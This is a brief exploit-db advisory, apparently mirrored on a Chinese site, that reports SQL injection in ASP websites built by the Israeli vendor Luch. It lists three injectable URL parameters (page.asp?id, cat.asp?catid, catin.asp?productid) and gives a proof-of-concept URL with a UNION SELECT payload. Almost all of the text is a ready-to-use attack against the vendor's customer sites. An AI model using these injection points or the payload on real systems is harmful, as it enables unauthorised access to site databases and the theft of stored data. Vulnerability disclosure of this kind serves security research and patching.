Luch Web Designer – Multiple SQL Injections - 体验盒子

作者： p0pc0rn

日期： 2011-03-10

类别：

webapps

平台：

asp

来源：https://www.exploit-db.com/exploits/16953/

Title	: Web Designed by LUCH Vulnerable to SQL Injection
Vendor	: http://www.luch.co.il
Found by: p0pc0rn

SQL
---

http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]

POC
---
http://site.com/page.asp?id=23 union select 1 from test.a